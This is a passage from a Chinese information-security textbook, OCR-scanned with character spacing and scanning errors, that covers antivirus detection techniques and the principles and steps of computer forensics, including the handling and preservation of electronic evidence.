征 串 匹配 ， 当 然 可 以 提高 准确 率 。 

© 更 先进 的 变形 病毒 /加 密 编 码 病毒 ， 虽 然 号 称 其 每 次 自我 复制 的 下 一 代 样本 中 不 
存在 任何 相同 的 两 处 以 上 连续 字 节 ， 实 际 上 也 是 指 静 态 存 储 形式 磁盘 上 的 静态 病毒 ) 
而 言 的 ， 根 本 上 还 是 以 一 个 普通 病毒 为 原型 ， 再 经 变形 算法 加 以 变换 处 理 实现 的 。 它 同 
样 会 在 虚拟 机 面前 显 出 原形 。 

© 虚拟 机 技术 仍然 与 传统 技术 相 结 合 ， 并 没有 抛弃 已 知 病毒 的 特征 知识 库 。 

5. 行为 监控 技术 

行为 监控 是 指 通过 审查 应 用 程序 的 操作 来 判断 是 否 有 恶意 〈 病 毒 ) 倾向 并 向 用 户 发 
出 警告 。 病 毒 程序 的 伪装 行为 越 多 ， 它 们 露出 的 马 脚 就 越 多 ， 就 越 容易 被 监测 到 。 这 种 
技术 能 够 有 效 防 止 病毒 的 传播 ， 但 也 很 容易 将 正常 的 升级 程序 、 补 丁 程序 误 报 为 病毒 。 

行为 监测 方法 是 以 某 种 行为 是 否 为 病毒 行为 作为 判断 病毒 的 依据 。 
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行为 监测 技术 的 优点 有 : 可 发 现 未 知 病毒 、 可 相当 准确 地 预报 未 知 的 多 数 病毒 。 行 
为 监测 技术 的 不 足 是 : 可 能 误 报警 、 不 能 识别 病毒 名 称 和 实现 时 有 一 定 难度 。 

6. 主动 防御 技术 

主动 防御 技术 并 不 是 一 项 全 新 的 技术 ， 从 某 种 程度 上 说 ， 其 集成 了 启发 式 扫描 技术 
和 行为 监控 及 行为 阻 断 等 技术 。 

主动 防御 是 一 种 阻止 恶意 程序 执行 的 技术 。 它 比较 好 地 弥补 了 传统 杀毒 软件 采用 
“特征 码 查 杀 ” 和 “监控 ”相对 滞后 的 技术 弱点 ， 可 以 在 病毒 发 作 时 进行 主动 而 有 效 的 全 
面 防范 ， 从 技术 层面 上 有 效应 对 未 知 病毒 的 肆虐 。 


45 计算 机 取证 


信息 技术 的 高 速 发 展 ， 正 在 深刻 地 改变 人 们 的 生活 ， 与 此 同时 ， 人 类 社会 对 信息 技 
术 的 依赖 ， 也 带 来 了 巨大 的 安全 风险 。 计 算 机 犯罪 正在 我 们 身边 频繁 发 生 ， 这 种 犯罪 行 
为 包括 了 窃取 和 破坏 数据 、 传 播 恶意 程序 、 提 供 违 法 信息 、 诈 骗 以 及 恐吓 等 多 种 多 样 的 
形式 。 

人 们 每 天 面 对 大 量 的 计算 机 犯罪 案例 , 如 商业 机 密 信息 的 窃取 与 破坏 、 计算 机 欺诈 、 
对 政府 或 金融 网 站 的 破坏 等 ,这 些 案 例 的 取证 工作 需要 提取 存在 于 计算 机 系统 中 的 数据 ， 
甚至 需要 从 已 被 删除 、 加 密 或 破坏 的 文件 中 获取 信息 。 电 子 证 据 本 身 和 取证 过 程 存在 许 
多 有 别 于 传统 物证 和 取证 的 特点 ， 它 们 对 司法 和 计算 机 科学 领域 都 提出 了 新 的 挑战 。 

因为 计算 机 罪犯 往往 可 以 不 受 限 制 的 获取 进行 犯罪 所 需 的 专业 知识 ， 其 实施 犯案 行 
为 不 受 地 域 限制 ， 并 且 具 有 高 隐蔽 性 的 特征 ， 所 以 计算 机 犯罪 案件 数量 增长 十 分 迅速 。 
大 量 的 事实 已 经 证 明 ， 在 计算 机 犯罪 手段 与 网 络 安全 防御 技术 不 断 升 级 的 形势 下 ， 单 靠 
网 络 安全 技术 打击 计算 机 犯罪 不 可 能 非常 有 效 ， 因 此 需要 发 挥 社会 和 法 律 的 强大 威力 来 
对 付 网 络 犯罪 ， 以 更 多 的 主动 性 手段 来 打击 和 威慑 计算 机 犯罪 。 计 算 机 取证 正 是 在 这 种 
形势 下 产生 和 发 展 的 ， 它 标志 着 网 络 安全 防御 理论 的 成 熟 。 

2012 年 第 十 一 届 全 国人 民 代 表 大 会 第 五 次 会 议 审议 通过 的 《中 华人 民 共 和 国 刑事 诉 
讼 法 修正 案 》 在 第 十 三 条 中 将 视听 资料 、 电 子 数据 共同 作为 刑事 诉讼 证 据 第 八 类 。 同年 ， 
《中 华人 民 共 和 国民 事 诉讼 法 修正 案 》 也 在 第 十 二 条 中 将 电子 数据 纳入 民事 诉讼 证 据 种 
类 ， 作 为 第 五 类 证 据 。 电 子 证 据 的 法 律 地 位 得 以 最 终 确 立 。 这 是 我 国电 子 证 据 发 展 的 一 
大 进步 ， 说 明 电子 证 据 在 诉讼 案件 中 将 发 挥 更 加 重要 的 作用 。 
4.5.1 计算 机 取证 的 基本 概念 

计算 机 取证 资深 专家 Robbins 给 出 了 如 下 的 定义 : 计算 机 取证 是 将 计算 机 调查 和 分 


析 技 术 应 用 于 对 潜在 的 、 有 法 律 效 力 的 证 据 的 确定 与 提取 上 。 计 算 机 紧急 事件 响应 组 和 
取证 咨询 公司 New Technologies 进一步 扩展 了 该 定义 : 计算 机 取证 包括 了 对 以 磁 介 质 编 
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码 信息 方式 存储 的 计算 机 证 据 的 保护 、 确 认 、 提 取 和 归档 。 美 国 系统 管理 和 网 络 安全 协 
= ( System Administration, Networking, and Security Institute, SANS) 则 归结 为 : 计算 
机 取证 是 使 用 软件 和 工具 ， 按 照 一 些 预先 定义 的 程序 ， 全 面 地 检查 计算 机 系统 ， 以 提取 
和 保护 有 关 计算 机 犯罪 的 证 据 。 

Enterasys 公司 CTO、 办 公 室 网 络 安全 设计 师 Dick Bussiere 则 认为 ， 计 算 机 取证 
(Computer Forensics) 也 可 以 称 作 计算 机 医学 ， 是 指 将 计算 机 系统 视 为 犯罪 现场 ， 运 用 
先进 的 辨析 技术 ， 对 计算 机 犯罪 行为 进行 法 医 式 的 揭 破 ， 搜 寻 确 认罪 犯 及 其 犯罪 证 据 ， 
并 据 此 发 起 诉讼 的 过 程 和 技术 。 该 定义 强调 了 计算 机 取证 和 法 医学 的 关联 性 。 

综合 以 上 定义 认为 ,计算 机 取证 是 指 对 能 够 为 法 庭 接受 的 、 足够 可 靠 和 有 说 服 力 的 、 
存在 于 计算 机 和 相关 外 设 中 的 电子 证 据 的 确认 、 保 护 、 提 取 和 归档 的 过 程 ， 它 能 推动 和 
促进 犯罪 事件 的 重 构 ， 或 者 帮助 预见 有 害 的 未 经 授权 的 行为 。 

若 从 一 种 动态 的 观点 来 看 ， 计 算 机 取证 可 归纳 为 以 下 儿 点 : 

。 是 一 门 在 犯罪 进行 过 程 中 或 之 后 收集 证 据 的 技术 

。 需要 重 构 犯罪 行为 ; 

。 将 为 起 诉 提供 证 据 ; 

o 对 计算 机 网 络 进行 取证 尤其 困难 ， 且 完全 依靠 所 保护 的 犯罪 场景 的 信息 质量 。 

计算 机 取证 在 打击 计算 机 和 网 络 犯 罪 中 作用 十 分 关键 ， 它 的 目的 是 要 将 犯罪 者 留 在 
计算 机 中 的 “痕迹 ”作为 有 效 的 诉讼 证 据 提供 给 法 庭 ， 以 便 将 犯罪 嫌疑 人 强 之 以 法 。 因 
此 ， 计 算 机 取证 是 计算 机 领域 和 法 学 领域 的 一 门 交 叉 科 学 ， 被 广泛 应 用 于 计算 机 犯罪 和 
事故 ， 包 括 网 络 入 侵 、 知 识 产 权 盗用 和 网 络 欺 骗 等 。 随 着 人 们 生活 对 电子 产品 和 网 络 的 
依赖 ， 计 算 机 取证 必 将 逐渐 应 用 到 生活 的 方方面面 。 

从 技术 角度 看 ， 计 算 机 取证 是 提取 和 分 析 硬 盘 、 光 盘 、 软 盘 、Zip 磁盘 、U 盘 、 内 
存 缓冲 和 其 他 形式 的 储存 介质 以 发 现 犯罪 证 据 的 过 程 ， 即 计算 机 取证 包括 了 对 以 磁 介 质 
编码 信息 方式 存储 的 计算 机 证 据 的 保护 、 确 认 、 分 析 、 提 取 和 归档 。 取 证 的 方法 通常 是 
使 用 软件 和 工具 ， 按 照 一 些 预先 定义 的 程序 ， 全 面 地 检查 计算 机 系统 ， 以 提取 和 保护 有 
关 计算 机 犯罪 的 证 据 。 


4.5.2 ”电子 证 据 及 特点 


计算 机 取证 主要 是 围绕 电子 证 据 进行 的 。 

学 术 界 对 电子 证 据 有 多 种 定义 。 其 中 一 种 定义 认为 ， 电 子 证 据 也 称 为 计算 机 证 据 ， 
是 指 在 计算 机 或 计算 机 系统 运行 过 程 中 产生 的 ， 以 其 记录 的 内 容 来 证 明 案 件 事 实 的 电磁 
记录 。 随 着 多 媒体 技术 的 发 展 ， 电 子 证 据 综 合 了 文本 、 图 形 、 图 像 、 动 画 、 音 频 及 视频 
等 多 种 类 型 的 信息 。 

与 传统 证 据 一 样 ， 电 子 证 据 必须 是 可 信 、 准 确 、 完 整 、 符 合法 律 法 规 的 ， 是 法 庭 所 
能 够 接受 的 。 同 时 ， 电 子 证 据 与 传统 证 据 不 同 ， 具 有 高 科技 性 、 无 形 性 和 易 破坏 性 等 
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高 科技 性 是 指 电子 证 据 的 产生 、 储 存 和 传输 ， 都 必须 借助 于 计算 机 技术 、 存 储 技术 、 
网 络 技术 等 ， 离 开 了 相应 技术 设备 ， 电 子 证 据 就 无 法 保存 和 传输 。 

无 形 性 是 指 电子 证 据 肉 眼 不 能 够 直接 可 见 的， 必须 借助 适当 的 工具 。 

易 破 坏 性 是 指 电子 证 据 很 容易 被 自 改 、 删 除 。 计 算 机 取证 要 解决 的 关键 问题 是 电子 
物证 如 何 收集 、 如 何 保护 、 如 何 分 析 和 如 何 展 示 。 

可 以 用 作 计 算 机 取证 的 信息 源 有 很 多 ， 如 操作 系统 日 志 ， 防 火 墙 与 入 侵 检测 系统 等 
安全 设备 的 工作 记录 、 安 全 防护 病毒 软件 日 志 、 系 统 审计 记录 、 网 络 监控 设备 日 志 及 实 
时 流量 、 电 子 邮件 系统 日 志 、 电 子 邮件 内 容 、 操 作 系统 文件 、 数 据 库 文件 和 操作 记录 、 
应 用 程序 记录 、 硬 盘 交 换 分 区 、 软 件 设置 参数 和 文件 、 完 成 特定 功能 的 脚本 文件 、Web 
浏览 器 数据 缓冲 、 书 签 、 历 史记 录 或 会 话 日 志 、 实 时 聊天 记录 、 微 信 朋 友 圈 、 微 博 记 
录 等 。 

具备 高 科技 作案 技能 的 犯罪 嫌疑 人 通常 具备 较 强 的 反 侦 查 能 力 ， 可 以 在 事后 将 自身 
在 受害 方 系统 中 的 作案 “痕迹 ”进行 删除 或 控 除 ， 如 尽量 删除 或 修改 日 志文 件 或 对 应 条 
目 及 其 他 有 关 记录 。 但 是 ， 一 般 的 删除 文件 操作 ， 即 使 在 清空 了 回收 站 后 ， 如 果 不 是 对 
人 硬盘 进行 低级 格式 化 处 理 或 将 履 盖 掉 原 始 数据 ， 仍 有 可 能 恢复 已 经 被 删除 的 文件 。 


4.5.3 计算 机 取证 技术 


计算 机 取证 主要 是 对 电子 证 据 的 获取 、 分 析 、 归 档 、 保 存 和 描述 的 过 程 ， 而 电子 证 
据 需 要 在 法 庭 上 作为 证 据 展示 ， 进 行 计算 机 取证 时 应 当 充分 考虑 电子 证 据 的 真实 性 和 电 
子 证 据 的 证 明 力 。 
45.3.1 计算 机 取证 步骤 

根据 电子 证 据 的 特点 ， 在 进行 计算 机 取证 时 ， 首 先 应 及 早 进 行 各 类 证 据 的 搜集 ， 并 
保证 收集 到 的 证 据 本 身 没有 受到 任何 破坏 。 在 取证 过 程 中 必须 保证 证 据 连 续 性 ， 即 在 证 
据 被 正式 提交 给 法 庭 时 ， 必 须 能 够 说 明 在 证 据 从 最 初 的 获取 状态 到 在 法 庭 上 出 现状 态 之 
间 的 任何 变化 ， 当 然 最 好 是 没有 任何 变化 。 特 别 重 要 的 是 ， 计 算 机 取证 的 全 部 过 程 必 须 
是 受到 监督 的 ， 即 由 原告 委派 的 专家 进行 的 所 有 取证 工作 ， 都 应 该 受到 由 其 他 方 委派 的 
专家 的 监督 。 

除了 相关 准备 工作 之 外 ， 计 算 机 取证 的 通常 步骤 包括 : 保护 目标 计算 机 系统 、 确 定 
电子 证 据 、 收 集 电 子 证 据 、 保 全 电子 证 据 。 

1. 准备 工作 

充分 的 准备 工作 是 顺利 完成 调查 工作 的 前 提 ， 同 时 也 是 高 质量 完成 调查 取证 工作 的 
必要 保障 。 这 些 准备 工作 包括 : 

(1) 构建 取证 软件 工具 集 

保障 取证 工具 包 的 功能 完整 性 和 平台 完整 性 ， 尽量 针对 各 类 流行 的 操作 系统 ， 准 备 
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对 应 的 取证 工具 ， 或 者 准备 好 可 以 跨越 这 些 平台 进行 取证 的 工具 。 

在 选择 取证 工具 和 软件 时 应 尽量 遵循 一 个 原则 : 尽量 使 用 命令 行程 序 ， 尽 可 能 减少 
与 操作 系统 的 交互 和 影响 。GUI 程序 依赖 于 操作 系统 运行 环境 ， 而 且 对 内 存 和 存储 介质 
的 操作 远 比 命令 行程 序 复杂 ， 其 可 能 会 对 电子 证 据 的 合法 获取 产生 影响 〈 壁 如 可 能 影响 
取证 内 容 或 日 期 等 );， 当然 目 前 大 部 分 功能 丰富 的 优秀 取证 工具 都 属于 GUI 形式 ， 但 最 
好 留 在 分 析 证 据 时 使 用 。 

制作 各 种 操作 系统 的 基本 工具 集 : 由 于 目标 系统 已 经 存在 潜在 威胁 ， 因 此 我 们 不 能 
依靠 目标 系统 的 本 地 程序 、 依 赖 文件 和 系统 文件 去 展开 调查 ， 因 为 攻击 者 可 能 已 经 对 这 
些 文件 进行 了 修改 。 因 此 ， 我 们 需要 选择 在 实时 响应 时 将 要 使 用 的 工具 ， 以 及 这 些 工 具 
运行 时 将 要 调用 的 相关 链接 库 和 其 他 模块 。 随 着 调查 经 验 的 丰富 ， 调 查 员 的 调查 技能 会 
不 断 得 到 提升 ， 同 时 也 必然 会 对 工具 包 进 行 更 新 替换 。 但 需要 注意 的 是 ， 每 一 个 调查 工 
具 都 应 该 确保 其 完整 性 。 首 先 ， 要 在 合法 和 确保 安全 的 机 器 上 制作 这 些 工 具 盘 ， 并 且 还 
需要 制作 出 所 有 程序 的 文件 散 列 值 (如 MD5、SHA ) 校 验 列表 。 以 便于 事后 在 必要 时 (如 
在 法 庭 上 ) 证 明 所 使 用 取证 工具 的 合法 性 和 唯一 性 。 同 样 ， 对 初始 收集 到 的 电子 证 据 也 
应 该 有 文件 散 列 值 记录 ， 必 要 时 可 以 采用 多 种 散 列 值 ， 以 确保 证 据 的 完整 性 。 

准备 磁盘 镜像 或 备份 工具 : 在 采集 证 据 的 过 程 中 最 主要 的 工作 就 是 对 各 种 介质 进行 
镜像 。 在 不 同 操作 系统 下 ， 可 以 采用 一 些 软 件 程序 来 进行 磁盘 或 者 分 区 的 备份 。 辟 如 在 
UNIX 环境 下 ，dd 是 能 够 完成 这 项 工作 的 通用 命令 ， 通 过 它 可 以 很 容易 地 为 被 调查 机 器 
的 整个 驱动 器 制作 一 个 镜像 。Windows 平台 上 也 有 很 多 类 似 的 软件 ， 辟 如 常用 的 Ghost, 
也 可 以 用 来 完成 这 项 工作 。 

测试 工具 的 预期 功能 并 熟悉 工具 产生 的 痕迹 ， 在 选择 好 工具 之 后 ， 强 烈 建议 在 测试 
系统 上 进行 充分 测试 ， 以 确保 该 工具 可 以 搜集 到 预期 数据 ， 并 且 同 样 重要 的 是 ， 要 确定 
该 工具 使 用 时 产生 的 数字 痕迹 。 确 定 和 记录 这 些 工具 在 获取 数据 时 留 下 来 的 数据 是 非常 
重要 的 ， 这 有 利于 解释 在 对 目标 系统 进行 调查 分 析 时 产生 的 时 间 惟 和 系统 变化 。 

(2) 准备 硬件 取证 工具 箱 

确保 各 类 存储 介质 的 纯净 性 与 多 样 性 : 首先 存储 介质 要 干净 ， 用 于 存放 证 据 的 存储 
介质 一 定 要 事先 进行 处 理 ， 壁 如 使 用 公认 可 靠 的 数据 擦 除 软 件 进 行 擦 除 ， 以 避免 介质 中 
的 残余 数据 对 证 据 的 分 析 和 取信 造成 影响 。 在 存储 证 据 时 ， 最 常用 的 硬件 设备 是 移动 硬 
盘 ， 应 当 拥有 尽量 大 的 存储 容量 。 除 了 移动 硬盘 之 外 ， 软 盘 、Zip 软盘 、MO、CD-R 等 
存储 介质 也 应 该 尽量 充实 到 取证 工具 箱 中 ， 因 为 谁 也 无 法 事先 知道 被 调查 的 机 器 到 底 具 
有 怎样 的 外 部 设备 。 
确保 存储 介质 的 接口 兼容 性 : 存储 介质 的 接口 也 应 该 尽量 丰富 ， 至 少 应 该 同时 拥有 
IDE、SCSI、PCMCIA 等 各 种 常用 接口 的 移动 存储 设备 。 另 外 ， 取 证 工具 箱 中 还 应 该 包 
括 各 种 存储 设备 的 连接 线 缆 以 及 网 络 线 缆 和 和 转 接头 等 。 除 此 之 外 ， 还 应 准备 部 分 只 读 接 
口 ， 以 免 在 操作 的 过 程 中 对 源 数 据 产生 影响 。 
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确保 数据 获取 工具 的 多 样 性 ， 目标 系统 可 能 是 PC 终端 也 可 能 是 移动 智能 终端 ， 
或 是 服务 器 设备 等 ， 目 标 系统 可 能 处 于 关机 状态 ， 也 可 能 处 于 开机 状态 ， 在 不 同 的 状态 
下 ， 应 当 有 不 同 的 数据 提取 工具 或 硬件 。 壁 如 目前 很 多 专业 取证 公司 都 推出 了 可 以 对 目 
标 磁盘 进行 整 盘 快 速 复制 的 专用 硬件 ， 另 外 也 有 部 分 可 以 进行 动态 数据 获取 的 工具 。 

取证 专用 计算 机 : 在 进行 取证 时 ， 部 分 现场 可 能 需要 一 台 单 独 的 取证 计算 机 进行 相 
应 数据 的 存储 ， 该 取证 计算 机 通常 已 经 安装 了 必要 的 取证 分 析 软 件 ， 具 备 各 类 专用 的 取 
证 分 析 接 口 。 

计算 机 取证 技术 目标 已 经 比较 成 熟 ， 目 前 市 场 上 可 以 购买 到 很 多 专用 的 调查 设备 和 
专业 的 取证 工具 箱 ， 这 些 产 品 在 复制 数据 的 时 候 速 度 很 快 ， 接 口 丰 富 ， 便 于 携带 ， 且 进 
行 了 各 种 硬件 加 固 处 理 ， 可 以 应 付 各 种 取证 要 求 。 

通常 来 说 ， 取 证 调查 人 员 并 不 拥有 超级 技能 ， 因 此 调查 员 所 使 用 的 工具 箱 及 其 对 该 
工具 箱 的 熟练 使 用 程度 从 很 大 程度 上 决定 了 调查 取证 的 成 绩 。 在 部 分 犯罪 场景 下 ， 要 还 
原 犯 罪 现 场 或 事件 并 提取 犯罪 证 据 ， 涉 及 到 的 后 续 分 析 技 术 会 比较 复杂 ， 并 不 能 通过 简 
单 的 数据 定位 和 提取 解决 问题 ， 这 时 可 能 还 需要 进行 更 加 深入 的 分 析 和 专家 鉴定 。 

(3) 记录 具体 工作 流程 、 问 询 信息 的 相关 表格 

取证 合法 性 的 关键 之 一 是 文档 。 一 个 可 靠 的 案例 是 建立 在 支撑 文档 之 上 的 。 支 撑 文 
档 报告 着 证 据 是 起 源 自 何 处 以 及 如 何 对 其 进行 处 理 。 站 在 取证 的 立场 ， 证 据 收 集 过 程 应 
该 尽 可 能 少 地 对 原始 证 据 造成 更 改 ， 并 且 任 何 更 改 都 应 该 被 文档 记录 下 来 ， 并 且 在 最 终 
的 分 析 结 果 环 境 中 被 评估 。 取 证 分 析 所 提供 的 证 据 采 集 过 程 应 该 为 原始 数据 保存 一 个 完 
整 的 、 准 确 的 表示 ， 并 且 其 真实 性 和 完整 性 可 以 被 验证 ， 只 有 这 样 的 取证 分 析 才 被 认为 
是 合法 的 取证 。 

在 取证 分 析 过 程 中 不 仅 要 为 结果 进行 文档 记录 ， 同 时 也 要 为 每 个 取证 步骤 进行 文档 
记录 。 这 将 使 得 其 他 调查 人 员 可 以 评估 或 者 重复 该 取证 分 析 。 注 意 : 取证 同时 期 的 记录 
通常 在 很 多 年 后 会 被 引用 ， 以 帮助 调查 人 员 恢 复 当时 发 生 的 事件 、 进 行 的 工作 、 被 接见 
的 人 员 以 及 其 他 信息 。 文 档 的 常见 形式 包括 屏幕 截图 ， 捕 获 的 网 络 流量 ， 分 析 工 具 的 输 
出 结果 和 笔记 。 当 对 易 失 数据 进行 保存 时 ， 需 要 对 保存 的 数据 、 数 据 保存 时 间 、 使 用 的 
工具 进行 文档 记录 ， 并 且 计 算 所 有 输出 的 散 列 值 。 当 对 目标 计算 机 进行 取证 时 ， 对 计算 
机 的 数据 和 时 间 进 行 记录 并 且 将 其 与 一 个 可 信 的 事件 源 进 行 比较 是 十 分 关键 的 。 

2. 保护 目标 计算 机 系统 

首先 ， 需 要 隔离 目标 计算 机 系统 ， 保 证 取证 空间 和 环境 的 独立 性 ， 不 能 给 犯罪 嫌疑 
人 破坏 证 据 的 机 会 ， 应 避免 出 现任 何 更 改 系统 设置 、 损 坏 硬 件 、 破 坏 数 据 或 病毒 感染 的 
情况 ， 同 时 也 不 应 出 现任 何 物理 事故 〈 如 强制 重启 、 断 电 、 非 法 开机 等 )。 

为 了 确保 证 据 的 安全 、 可 信 ， 计 算 机 证 据 国 际 组 织 〈Intemational Organization on 
Computer Evidence, IOCE) 对 数字 证 据 的 采集 、 保 存 、 检 验 和 传送 提出 的 特别 要 求 :“ 必 
须 使 用 有 效 的 软 硬 件 进行 采集 和 检验 ; 数字 证 据 的 采集 、 检 验 、 传 送 全 过 程 都 必须 有 记 
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录 ; 任何 有 潜在 可 能 对 原始 数字 证 据 造成 改变 、 破 坏 或 毁坏 的 活动 必须 由 有 法 律 上 承认 
的 有 资质 的 人 进行 。” 

对 现场 计算 机 的 部 分 通用 处 理 原则 有 : 已 经 开机 的 计算 机 不 要 关机 【和 否则 容易 造成 
内 存 中 的 易 失 数 据 丢 失 ), 关机 的 计算 机 不 要 开机 (否则 容易 造成 部 分 数据 在 开机 的 过 程 
中 被 算 改 ， 甚 至 启动 破坏 性 程序 )。 如 果 现 场 计算 机 处 于 开机 状态 ， 应 避免 激活 屏幕 保护 
程序 。 同 时 应 检查 正在 进行 的 程序 操作 ， 如 果 发 现 系统 正在 删除 文件 、 格 式 化 、 上 传 文 
件 、 系 统 自 毁 或 进行 其 他 危险 活动 ， 立 即 切 断 电源 。 另 外 ， 也 还 应 防止 来 自 网 络 的 数据 
破坏 。 

现场 取证 时 ， 应 当 记录 系统 日 期 和 时 间 、 主 存储 器 内 容 、 当 前 执行 的 进程 列表 、 在 
端口 提供 服务 的 程序 列表 、 当 前 系统 内 用 户 列表 ， 如 果 是 联网 系统 ， 还 应 收集 当前 连 入 
系统 的 用 户 名 和 远程 系统 名 。 还 应 当 尽 可 能 记录 使 用 者 的 个 人 情况 、 用 户 名 、 口 令 、 密 
码 等 。 

对 于 计算 机 硬盘 数据 ， 应 使 用 专用 的 取证 工具 进行 硬盘 复制 ， 在 实验 室 对 备份 的 硬 
盘 进 行 检验 , 采集 证 据 。 原 始 硬 盘 应 封存 保管 。 对 于 取证 用 的 计算 机 ， 要 进行 病毒 检测 ， 
防止 病毒 传染 到 被 检测 的 计算 机 等 。 

3. 确定 电子 证 据 

目前 ， 计 算 机 存储 介质 容量 越 来 越 大 ， 因 此 有 必要 根据 系统 的 破坏 程度 ， 在 海量 数 
据 中 区 分 电子 证 据 和 无 用 数据 。 要 寻找 那些 由 犯罪 嫌疑 人 留 下 的 活动 记录 作为 电子 证 据 ， 
并 确定 这 些 记录 的 存放 位 置 和 存储 方式 。 

不 同 场景 、 不 同类 型 、 处 于 不 同 阶段 的 计算 机 犯罪 案件 ， 采 用 的 后 续 处 理 方式 和 步 
又 会 存在 较 大 差别 。 璧 如， 调查 知识 产权 侵犯 案件 与 调查 黑客 、 恶 意 代 码 攻击 事件 ， 则 
就 会 存在 很 大 差别 。 即 便 是 同一 类 型 的 案例 ， 针 对 不 同 技术 级 别 的 犯罪 嫌疑 人 ， 也 会 存 
在 不 同 。 

另外 ， 在 进行 计算 机 取证 时 ， 还 需要 征询 计算 机 设备 拥有 方 的 意见 ， 他 们 可 能 想 彻 
底 地 调查 该 事件 并 提出 起 诉 ， 也 可 能 只 想 大 致 评估 一 下 目前 的 状况 可 能 造成 的 损失 ， 值 
得 注意 的 是 ， 即 使 面 对 的 是 后 一 种 情况 ， 仍 需 进 行 合 规 的 处 理 以 保证 证 据 获取 和 存储 的 
合法 性 。 

4. 收集 电子 证 据 

在 进行 实际 取证 工作 时 需要 遵循 一 个 重要 的 原则 :“ 尽 量 避 免 在 被 调查 的 计算 机 上 
进行 工作 ”。 一 方面 是 因为 在 现场 目标 计算 机 环境 中 所 做 的 操作 越 多 , 对 原始 环境 进行 的 
改变 就 会 越 多 ， 也 就 更 难保 障 提取 的 “证 据 ” 的 完整 性 ， 其 势必 对 诉讼 过 程 产生 影响 
更 重要 的 是 ， 这 可 能 会 对 “犯罪 现场 ”造成 破坏 ， 而 彻底 失去 证 据 。 一 个 看 似 正常 的 操 
作 或 命令 有 可 能 引起 犯罪 嫌疑 人 的 警觉 ， 或 触发 到 预 设 处 理 机 制 ， 导 致 证 据 被 销毁 。 基 
此 ， 应 根据 现场 了 解 的 情况 尽早 采用 规范 合法 的 手段 生成 鉴定 副本 ， 将 分 析 工 作 留 在 可 
以 监控 、 拥 有 更 好 取证 分 析 设 施 的 实验 室 中 进行 。 
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在 已 经 关机 的 设备 上 ， 首 先 要 做 的 是 利用 准备 的 工具 和 设备 对 所 有 的 数据 介质 生成 
鉴定 副本 。 除 了 尽量 避免 在 被 调查 的 机 器 上 操作 ， 也 不 能 在 目标 计算 机 上 进行 分 析 和 检 
查 ， 制 作 鉴定 副本 的 主要 目的 就 是 在 保证 可 以 在 尽量 少 接触 被 调查 机 器 的 情况 下 进行 证 
据 分 析 ， 对 原始 介质 的 操作 可 能 使 其 完全 表 失 作为 证 据 的 可 信 性 。 

在 部 分 情况 下 ， 取 证 人 员 可 能 无 法 获取 完整 的 鉴定 副本 ， 壁 如 内 存 中 的 重要 数据 ， 
此 时 只 有 在 开机 状态 来 获取 证 据 。 此 种 场景 更 需 格外 谨慎 ， 以 免 破 坏 证据 ， 或 导致 证 据 
提取 过 程 的 不 合法 。 在 开机 状态 下 ， 一 个 目标 系统 包含 了 能 够 反映 系统 状态 的 关键 而 短 
暂 的 信息 ( 易 失 性 数据 )。 在 从 实时 系统 中 搜集 数据 时 ,必须 考虑 易 失 性 数据 丢失 的 先后 
顺序 ,这 样 才能 够 尽量 保证 取证 需要 的 数据 在 关键 系统 数据 丢失 或 者 系统 关机 前 被 获取 。 

另外 ， 取 证 分 析 人 员 应 该 在 整个 取证 过 程 中 详细 记录 操作 步 又、 方式 、 方 法 和 时 间 
等 。 在 成 功 提取 到 内 存 中 的 易 失 性 数据 ， 就 可 以 继续 对 非 易 失 性 数据 进行 提取 备份 。 注 
意 ， 对 于 从 现场 调查 中 获取 的 所 有 数据 ， 都 必须 单独 记录 其 散 列 〈 如 MDS 值 ) 和 其 他 
属性 值 ， 以 保障 现场 调查 没有 破坏 证 据 的 可 靠 性 。 

5. 保护 电子 证 据 

在 获取 了 所 有 证 据 之 后 ， 应 该 妥善 封存 被 调查 的 机 器 和 设备 ， 连 同 生成 的 鉴定 副本 
一 同 加 入 “证 据 保管 链 ”， 其 意义 主要 在 于 每 次 对 被 保管 物 的 使 用 和 变更 都 能 够 被 记录 和 
验证 ， 以 便于 后 续 的 证 据 合 法 性 审核 。 

在 实际 工作 中 ， 需 要 为 每 一 项 证 据 (包括 工具 包 ) 粘贴 保管 标签 ， 在 保管 标签 上 必 
须 体现 的 内 容 包 括 : 证 据 来 源 、 生 成 时 间 、 证 据 当 前 保存 位 置 、 证 据 转交 地 点 、 证 据 转 
交 原 因 以 及 转交 人 和 接手 人 的 签字 ， 必 要 时 可 以 增加 第 三 在 场 人 进行 签字 以 作为 证 明 。 
因为 证 据 大 部 分 情况 下 是 以 数字 形式 进行 保存 的 ， 我 们 还 应 当 利用 数字 摘要 或 签名 技术 
为 证 据 生 成 电子 指纹 ， 以 便于 后 期 验证 原始 证 据 的 完整 性 。 

对 调查 取证 过 程 中 生成 的 数据 镜像 备份 介质 应 当 加 封条 并 存放 在 安全 的 场所 ， 采 取 
必要 的 安全 措施 和 访问 控制 方式 进行 保护 。 

45.3.2 ”计算 机 取证 分 析 技 术 

电子 证 据 需 要 借助 计算 机 的 辅助 程序 来 查看 ， 分 析 电 子 证 据 的 信息 需要 很 深 的 专业 
知识 ， 应 依靠 专业 的 取证 专家 。 通 常 取证 分 析 工 作 中 用 到 的 技术 包括 : 

1. 对 比分 析 与 关键 字 查 询 

将 收集 的 程序 、 数 据 、 备 份 等 与 当前 运行 的 程序 、 数 据 进行 对 比 ， 从 中 发 现 算 改 的 
痕迹 ;或 者 对 所 做 的 系统 硬盘 备份 ， 用 关键 字 匹配 查询 ， 从 中 发 现 与 案件 关联 的 线索 ; 
或 者 与 已 有 的 恶意 文件 库 进 行 对 比 ， 以 发 现 非法 程序 。 

2. 文件 特征 分 析 技 术 

文件 特征 可 能 包含 多 个 方面 : 

(1) 文件 系统 特征 : 譬如 文件 的 大 小 ， 生 成 时 间 、 修 改 时 间 、 最 后 访问 时 间 ， 读 写 、 
隐藏 属性 等 ， 甚 至 还 可 以 考虑 文件 的 扇 区 存储 位 置 、 连 续 存储 特征 等 。 
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(2) 文件 操作 特征 : 对 于 不 同 的 应 用 软件 来 说 ， 其 可 能 会 存储 部 分 操作 信息 到 目标 
文件 中 。 壁 如 office 文档 的 作者 信息 。 

(3) 文件 格式 特征 等 : 不 同类 型 的 文件 ， 具 有 不 同 的 文件 格式 〈 如 可 执行 程序 、 图 
片 、 视 频 、 文 档 、 压 缩 文件 等 都 具有 不 同 的 格式 )。 在 取证 过 程 中 ,文件 的 后 级 未 必 能 够 
反映 其 真实 格式 ， 因 此 对 文件 格式 特征 进行 分 析 ， 可 以 更 加 准确 地 识别 部 分 伪装 。 

